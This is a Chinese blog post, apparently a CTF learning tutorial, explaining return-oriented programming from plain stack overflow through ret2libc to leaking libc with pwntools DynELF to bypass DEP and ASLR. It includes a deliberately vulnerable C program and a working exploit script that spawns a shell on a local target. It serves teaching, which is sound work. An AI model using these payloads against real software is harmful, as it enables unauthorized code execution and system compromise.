<!doctype html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Hexo, NexT" />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1" />






<meta name="description" content="一 、序ROP的全称为Return-oriented programming（返回导向编程），这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御（比如内存不可执行和代码签名等）。参考文章">
<meta property="og:type" content="article">
<meta property="og:title" content="PWN 学习之 ROP篇">
<meta property="og:url" content="http://yoursite.com/2017/05/07/PWN 学习之 ROP篇/index.html">
<meta property="og:site_name" content="L">
<meta property="og:description" content="一 、序ROP的全称为Return-oriented programming（返回导向编程），这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御（比如内存不可执行和代码签名等）。参考文章">
<meta property="og:image" content="https://ooo.0o0.ooo/2017/06/04/59330814a0ef7.png">
<meta property="og:image" content="https://ooo.0o0.ooo/2017/06/04/59330818057a3.png">
<meta property="og:image" content="https://ooo.0o0.ooo/2017/06/04/59330817e33ff.png">
<meta property="og:image" content="https://ooo.0o0.ooo/2017/06/04/593308118de6b.png">
<meta property="og:updated_time" content="2017-06-03T19:10:56.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="PWN 学习之 ROP篇">
<meta name="twitter:description" content="一 、序ROP的全称为Return-oriented programming（返回导向编程），这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御（比如内存不可执行和代码签名等）。参考文章">
<meta name="twitter:image" content="https://ooo.0o0.ooo/2017/06/04/59330814a0ef7.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2017/05/07/PWN 学习之 ROP篇/"/>





  <title>PWN 学习之 ROP篇 | L</title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?e874447fc2f619cfe220dc6a05c4e5b3";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>











  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">L</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2017/05/07/PWN 学习之 ROP篇/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Lucaks">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/blog_head.jpeg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="L">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">PWN 学习之 ROP篇</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-05-07T01:28:06+08:00">
                2017-05-07
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/PWN/" itemprop="url" rel="index">
                    <span itemprop="name">PWN</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2017/05/07/PWN 学习之 ROP篇/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count"
                        data-disqus-identifier="2017/05/07/PWN 学习之 ROP篇/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="一-、序"><a href="#一-、序" class="headerlink" title="一 、序"></a>一 、序</h2><p>ROP的全称为Return-oriented programming（返回导向编程），这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御（比如内存不可执行和代码签名等）。<a href="http://jaq.alibaba.com/community/art/show?spm=a313e.7916646.24000001.11.MtR4jX&amp;articleid=403" target="_blank" rel="external">参考文章</a><br><a id="more"></a></p>
<h2 id="程序流劫持"><a href="#程序流劫持" class="headerlink" title="程序流劫持"></a>程序流劫持</h2><p>比较常见的程序流劫持就是栈溢出，格式化字符串攻击和堆溢出了。通过程序流劫持，攻击者可以控制PC指针从而执行目标代码。为了应对这种攻击，系统防御者也提出了各种防御方法，最常见的方法有DEP（堆栈不可执行），ASLR（内存地址随机化），Stack Protector（栈保护）等。但是如果上来就部署全部的防御，初学者可能会觉得无从下手，所以我们先从最简单的没有任何保护的程序开始，随后再一步步增加各种防御措施，接着再学习绕过的方法，循序渐进。<br>首先来看这个有明显缓冲区溢出的程序：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line">#include &lt;stdio.h&gt;</div><div class="line">#include &lt;stdlib.h&gt;</div><div class="line">#include &lt;unistd.h&gt;</div><div class="line"></div><div class="line">void vulnerable_function() &#123;</div><div class="line">	char buf[128];</div><div class="line">	read(STDIN_FILENO, buf, 256);</div><div class="line">&#125;</div><div class="line"></div><div class="line">int main(int argc, char** argv) &#123;</div><div class="line">	vulnerable_function();</div><div class="line">	write(STDOUT_FILENO, &quot;Hello, World\n&quot;, 13);</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<h4 id="1-无防护"><a href="#1-无防护" class="headerlink" title="1.无防护"></a>1.无防护</h4><p>在没有任何防护的情况下，我们可以直接在栈上执行我们的shellcode，并且函数加载地址不会每次都变化。我们需要通过一个pattern生成定位字符串找到我们的溢出点。当我们找到溢出点后就可以构造 “A”*n+ret的字符串，就可以让pc执行ret地址上的代码了。<strong>ret:栈顶字单元出栈，其值赋给IP寄存器。 即实现了一个程序的转移，将栈顶字单元保存的偏移地址作为下一条指令的偏移地址。</strong><br>此处我们可以利用buffer，将我们的shellcode放置到上面。然后通过ret控制eip跳转到我们的shellcode上。<code>[shellcode][&#39;AAAAA......&#39;][ret]</code>。<br>此处我们需要的注意的是gdb调试环境会影响buf在内存中的地址。虽然我们关闭了ASLR,但是只能保证buf的地址在gdb的调试环境中不会变化，但当我们直接执行程序的时候，buf的地址会固定在别的地址上。我们可以开启core dump这个功能</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">ulimit -c unlimited</div><div class="line">sudo sh -c &apos;echo &quot;/tmp/core.%t&quot; &gt; /proc/sys/kernel/core_pattern&apos;</div></pre></td></tr></table></figure>
<p>开启后，当出现内存错误的时候，系统会生成一个core dump文件在tmp目录下。然后我们利用gdb查看这个core文件就能获取到buf的真正地址。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">gdb xxx /tmp/core.xxxxxx</div></pre></td></tr></table></figure>
<h4 id="2-Ret2libc-Bypass-DEP-通过ret2libc-绕过DEP防护"><a href="#2-Ret2libc-Bypass-DEP-通过ret2libc-绕过DEP防护" class="headerlink" title="2 Ret2libc-Bypass DEP 通过ret2libc 绕过DEP防护"></a>2 Ret2libc-Bypass DEP 通过ret2libc 绕过DEP防护</h4><p>如果开启了DEP，stack就不能直接执行我们的shellcode代码。这个时候我们就需要另外的方法绕过。libc.so里保存了大量可利用的函数，我们如果可以让程序执行system(“/bin/sh”)的话，也可以获取到shell。如果关掉了ASLR的话，system()函数在内存中的地址是不会变化的，并且libc.so中也包含”/bin/sh”这个字符串，并且这个字符串的地址也是固定的。那么接下来我们就来找一下这个函数的地址。这时候我们可以使用gdb进行调试。然后通过print和find命令来查找system和”/bin/sh”字符串的地址。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">print system 打印函数的基地址</div><div class="line">find &quot;/bin/sh&quot;</div></pre></td></tr></table></figure>
<p>找到了system的地址，“/bin/sh”的地址，我们就能构造如下的shellcode。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">payload=&apos;A&apos;*n+p32(system_addr)+p32(ret)+p32(binsh_addr)</div></pre></td></tr></table></figure>
<p><strong>要注意的是system()后面跟的是执行完system函数后要返回地址，接下来才是”/bin/sh”字符串的地址。因为我们执行完后也不打算干别的什么事，所以我们就可以随便写一个4字节的ret来填充.</strong></p>
<h4 id="3、ROP-ByPass-DEP-and-ASLR-通过ROP绕过DEP和ASLR防护"><a href="#3、ROP-ByPass-DEP-and-ASLR-通过ROP绕过DEP和ASLR防护" class="headerlink" title="3、ROP-ByPass DEP and ASLR 通过ROP绕过DEP和ASLR防护"></a>3、ROP-ByPass DEP and ASLR 通过ROP绕过DEP和ASLR防护</h4><p>因为开启了ASLR，所以每次libc.so的加载地址都是变化的，这个时候我们就需要先解决这个问题，然后才能利用ret2libc的方法得到shell.<br>思路是：我们需要先泄漏出libc.so某些函数在内存中的地址，然后再利用泄漏出的函数地址根据偏移量计算出system()函数和/bin/sh字符串在内存中的地址，然后再执行我们的ret2libc的shellcode。既然栈，libc，heap的地址都是随机的。我们怎么才能泄露出libc.so的地址呢？方法还是有的，因为程序本身在内存中的地址并不是随机的，如图所示：<br><img src="https://ooo.0o0.ooo/2017/06/04/59330814a0ef7.png" alt="14941651361767.png"></p>
<p>我们发现除了程序本身的实现的函数之外，我们还可以使用read@plt()和write@plt()函数。但因为程序本身并没有调用system()函数，所以我们并不能直接调用system()来获取shell。但其实我们有write@plt()函数就够了，因为我们可以通过write@plt ()函数把write()函数在内存中的地址也就是write.got给打印出来。既然write()函数实现是在libc.so当中，那我们调用的write@plt()函数为什么也能实现write()功能呢? 这是因为linux采用了延时绑定技术，当我们调用write@plit()的时候，系统会将真正的write()函数地址link到got表的write.got中，然后write@plit()会根据write.got 跳转到真正的write()函数上去。（如果还是搞不清楚的话，推荐阅读《程序员的自我修养 - 链接、装载与库》这本书）<br>因为system()函数和write()在libc.so中的offset(相对地址)是不变的，所以如果我们得到了write()的地址并且拥有目标服务器上的libc.so就可以计算出system()在内存中的地址了。然后我们再将pc指针return回vulnerable_function()函数，就可以进行ret2libc溢出攻击，并且这一次我们知道了system()在内存中的地址，就可以调用system()函数来获取我们的shell了。<br>使用ldd命令可以查看目标程序调用的so库。随后我们把libc.so拷贝到当前目录，因为我们的exp需要这个so文件来计算相对地址。<br>攻击流程图如下：<br><img src="https://ooo.0o0.ooo/2017/06/04/59330818057a3.png" alt="14941652944059.png"></p>
<p>通过write函数将地址泄露出去。</p>
<hr>
<p>在write执行完成后需要二次溢出，所以我们在write执行完后需要调用原函数一次。栈空间分布如下图：<br><img src="https://ooo.0o0.ooo/2017/06/04/59330817e33ff.png" alt="14941654146332.png"></p>
<p>最后通过ret2libc执行我们最终的 system(“/bin/sh”)</p>
<h2 id="leak-得到函数的泄露地址"><a href="#leak-得到函数的泄露地址" class="headerlink" title="leak 得到函数的泄露地址"></a>leak 得到函数的泄露地址</h2><p>上面绕过ASLR我们需要libc.so来计算system 等数据的地址。当往往我们并没有对方的libc.so。这意味我们无法直接得到函数地址。此时我们需要pwntools提供的DynELF,构造一个leak,不停的去读写libc，找到我们需要的函数地址，代码如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">#!/usr/bin/env pythonfrom pwn import *p = process(&apos;./level2&apos;)elf = ELF(&apos;level2&apos;)#p = remote(&apos;127.0.0.1&apos;, 10003)plt_write= elf.symbols[&apos;write&apos;]plt_read  = elf.symbols[&apos;read&apos;]print &apos;plt_write= &apos; + hex(plt_write)print &apos;plr_read= &apos;+hex(plt_read)vulfun_addr = 0x8048436print &apos;vulfun= &apos; + hex(vulfun_addr)main_addr=elf.symbols[&apos;main&apos;]def leak(address):	payload=&quot;A&quot;*140+p32(plt_write)+p32(main_addr)+p32(1)+p32(address)+p32(4)	p.sendline(payload)	data=p.recv(4)	log.debug(&quot;%#x =&gt; %s&quot; % (address, (data or &apos;&apos;).encode(&apos;hex&apos;)))	return dataprint recvline()dynelf=DynELF(leak,elf=ELF(&quot;level2&quot;))systemAddress=dynelf.lookup(&apos;system&apos;,&apos;libc&apos;)print &quot;systemAddress: &quot;,hex(systemAddress)bss_addr=elf.symbols[&apos;__bss_start&apos;]print &quot;bss_addr: &quot;,hex(bss_addr)pop_addr=0x80484bdpayload1=&quot;A&quot;*140+p32(plt_read)+p32(pop_addr)+p32(0)+p32(bss_addr)+p32(8)payload1+=p32(systemAddress)+p32(vulfun_addr)+p32(bss_addr)p.sendline(payload1)p.sendline(&quot;/bin/sh\0&quot;)p.interactive()</div></pre></td></tr></table></figure>
<p>效果图：<br><img src="https://ooo.0o0.ooo/2017/06/04/593308118de6b.png" alt="14941748383625.png"></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/05/02/ init_array下断/" rel="next" title="init_array下断">
                <i class="fa fa-chevron-left"></i> init_array下断
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/06/01/使用dumpdecrypted 砸壳/" rel="prev" title="使用dumpdecrypted 砸壳">
                使用dumpdecrypted 砸壳 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/blog_head.jpeg"
               alt="Lucaks" />
          <p class="site-author-name" itemprop="name">Lucaks</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">6</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">3</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#一-、序"><span class="nav-number">1.</span> <span class="nav-text">一 、序</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#程序流劫持"><span class="nav-number">2.</span> <span class="nav-text">程序流劫持</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-无防护"><span class="nav-number">2.0.1.</span> <span class="nav-text">1.无防护</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-Ret2libc-Bypass-DEP-通过ret2libc-绕过DEP防护"><span class="nav-number">2.0.2.</span> <span class="nav-text">2 Ret2libc-Bypass DEP 通过ret2libc 绕过DEP防护</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3、ROP-ByPass-DEP-and-ASLR-通过ROP绕过DEP和ASLR防护"><span class="nav-number">2.0.3.</span> <span class="nav-text">3、ROP-ByPass DEP and ASLR 通过ROP绕过DEP和ASLR防护</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#leak-得到函数的泄露地址"><span class="nav-number">3.</span> <span class="nav-text">leak 得到函数的泄露地址</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Lucaks</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.1"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  

    
      <script id="dsq-count-scr" src="https://.disqus.com/count.js" async></script>
    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'http://yoursite.com/2017/05/07/PWN 学习之 ROP篇/';
          this.page.identifier = '2017/05/07/PWN 学习之 ROP篇/';
          this.page.title = 'PWN 学习之 ROP篇';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  




	





  





  





  






  





  

  

  

  

  

  

</body>
</html>
